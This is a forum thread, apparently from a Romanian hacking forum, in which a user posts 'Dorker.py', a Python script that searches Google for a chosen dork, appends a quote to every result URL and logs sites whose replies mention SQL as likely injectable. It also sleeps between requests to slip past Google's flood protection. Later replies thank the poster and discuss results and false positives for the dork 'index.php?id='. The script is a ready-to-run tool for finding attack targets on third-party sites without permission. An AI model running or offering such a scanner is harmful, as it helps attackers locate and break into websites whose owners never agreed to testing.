Active Members Fi8sVrs Posted July 17, 2011 Active Members Report Share Posted July 17, 2011 (edited) #!/usr/bin/python## Dorker.py## SQL Dork finder script that crawls google for sites vulnerable to SQL Injection## Author: Xinapse## Website: http://www.iexploit.org## Email: iexploittube@gmail.com## Twitter: #iExploitXinapse## Version 0.0.1## Usage dorker.py [options]from xgoogle.search import GoogleSearch, SearchErrorimport time, urllib2, optparseprint '''________ __ \______ \ ___________| | __ ____ _______ | | \ / _ \_ __ \ |/ /_/ __ \\_ __ \| ` ( <_> ) | \/ < \ ___/ | | \//_______ /\____/|__| |__|_ \ \___ >|__| \/ \/ \/ ----------------------------------------------------------------------------------- dorker.py ---- SQL Dork finder script ---- Author: Xinapse ---- Website: http://www.iexploit.org ---- Email: iexploittube@gmail.com ---- Twitter: #iExploitXinapse ---- Version 0.0.1 ---- Usage dorker.py [options] -----------------------------------------------------------------------------------'''parser = optparse.OptionParser()options = optparse.OptionGroup(parser, 'Options')parser.add_option('-d', '--dork', action='store', type='string', help='Dork to Scan', metavar='DORK')parser.add_option('-f', '--file', action='store', type='string', help='Filename to save', metavar='FILE')parser.add_option('-v', '--verbose', action="store_true", dest="verbose", default=False, help="Adds extra status messages showing program execution")parser.add_option('-e', '--evasion', action='store', type='string', help='How long to sleep between each google request, used to prevent google blocking your IP for too many requests, recommended at least 5+, default 10', metavar='EVASION')(opts, args) = parser.parse_args()urlno = 0invuln = 0if opts.dork: dork = opts.dorkelse: print '>> Please enter a dork'if opts.file: filename = opts.fileelse: print '>> Please enter a filename'if opts.verbose: verbose = 'true'else: verbose = 'false'if opts.evasion: evas = opts.evasionelse: evas = 10pagecount = 0counter = 0try: pagecount = pagecount + 1 if verbose == 'true': print '>> Crawling google page ' + str(pagecount) + '...' search = GoogleSearch(dork) while True: search.results_per_page=100 tmp = search.get_results() if not tmp: break if verbose == 'true': print '>> No more results...' for t in tmp: try: url = t.url.encode("utf8") if verbose == 'true': print '>> Testing ' + url + ' for vulnerabilities...' testurl = url + "'" req = urllib2.urlopen(testurl) data = req.read() if "sql" in data or "SQL" in data or "MySQL" in data or "MYSQL" in data or "MSSQL" in data: f = open (filename, "a") if verbose == 'true': print ">> Found possible injection in " + url f.write(testurl + "\n") f.close() counter = counter + 1 else: invuln = invuln + 1 except: errors = 1 if verbose == 'true': print '>> Sleeping to bypass google flood protection...' time.sleep(evas)except SearchError, e: print ">> Search failed: %s" % eprint '>> Dorker scan ended'print '>> ' + str(counter) + ' vulnerable sites found'print '>> ' + str(invuln) + ' sites not vulnerable'print '>> Thank you for using Dorker, output has been saved to ' + filenameDownload xgoogle library: https://github.com/pkrumins/xgoogleDorker.py A SQL Injection Dork Scanner Edited July 16, 2013 by Fi8sVrs 1 Quote Link to comment Share on other sites More sharing options...
learn Posted May 17, 2013 Report Share Posted May 17, 2013 Thank you very much! Quote Link to comment Share on other sites More sharing options...
CaBRoN88 Posted June 2, 2013 Report Share Posted June 2, 2013 e bun ? l-a probat cineva ? Quote Link to comment Share on other sites More sharing options...
yo20063 Posted June 25, 2013 Report Share Posted June 25, 2013 Probat eu acuma......fiti atenti ce mi-a gasit cu dork-ul "index.php?id=" la al 2 lea site! Quote Link to comment Share on other sites More sharing options...
PortocalaSexy Posted July 13, 2013 Report Share Posted July 13, 2013 Probat eu acuma......fiti atenti ce mi-a gasit cu dork-ul "index.php?id=" la al 2 lea site! Ti-a gasit asa pentru ca este in link sintagma index - php - id ... dar nicidecum ca ar fi vulnerabil Quote Link to comment Share on other sites More sharing options...
blech Posted July 13, 2013 Report Share Posted July 13, 2013 Probat eu acuma......fiti atenti ce mi-a gasit cu dork-ul "index.php?id=" la al 2 lea site! nu m-am uitat peste cod dar cred ca poti sa folosesti operatori gen inurl: si altele ca sa gasesti ce ai nevoie si rezultatele sa fie cat mai concrete. Quote Link to comment Share on other sites More sharing options...